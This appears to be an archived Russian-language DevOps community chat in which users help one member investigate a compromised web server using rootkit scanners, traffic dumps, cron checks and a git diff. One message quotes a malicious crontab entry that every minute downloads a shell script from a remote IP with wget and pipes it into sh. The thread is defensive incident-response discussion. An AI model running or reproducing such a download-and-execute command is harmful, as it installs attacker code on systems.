Size: a a a

DevOps — русскоговорящее сообщество

2020 November 23

a6

admin 666admin in DevOps — русскоговорящее сообщество
rkhunter / chkrootkit прогони, потом задампай трафик и смотри бек-коннекты и связность с левыми хостами
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
admin 666admin
сначала процессы надо смотреть и кроны, если червяк какой то связь с C&C  (по-трафику аномалии)
редис убрал ::1, опять уже вылезло
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
admin 666admin
rkhunter / chkrootkit прогони, потом задампай трафик и смотри бек-коннекты и связность с левыми хостами
руткитов нет, оно явно какую-то дыру в вебе ковыряет
источник

MT

M T in DevOps — русскоговорящее сообщество
а в акксес логи логов овер9000 и просмотреть все не вариант?
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
глазами? грепом -надо знать что грепать
источник

MT

M T in DevOps — русскоговорящее сообщество
ну глазами да
источник

MT

M T in DevOps — русскоговорящее сообщество
идем на время и минуту рассматриваем
источник

MT

M T in DevOps — русскоговорящее сообщество
если там конечно не овер9000
источник

MT

M T in DevOps — русскоговорящее сообщество
ну а грепать хз что, какой-нить пост
источник

MT

M T in DevOps — русскоговорящее сообщество
с поехавшими параметарми
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
sudo -u www-data crontab -l
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
источник

MT

M T in DevOps — русскоговорящее сообщество
кстати была гдето уязвимость в пхп фпм
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
хм.
Но оно - refused
источник

a6

admin 666admin in DevOps — русскоговорящее сообщество
Denis 災 nobody
руткитов нет, оно явно какую-то дыру в вебе ковыряет
сравни дифом содержимое проекта и гита
источник

a6

admin 666admin in DevOps — русскоговорящее сообщество
Denis 災 nobody
sudo -u www-data crontab -l
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
классика чо
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
admin 666admin
сравни дифом содержимое проекта и гита
git status - нет аномалий
источник

D

Denis 災 nobody in DevOps — русскоговорящее сообщество
admin 666admin
классика чо
но оно не качается )
источник

MT

M T in DevOps — русскоговорящее сообщество
источник

MT

M T in DevOps — русскоговорящее сообщество
ну я думаю ты это смотрел ужа
источник

MT

M T in DevOps — русскоговорящее сообщество
уже?
источник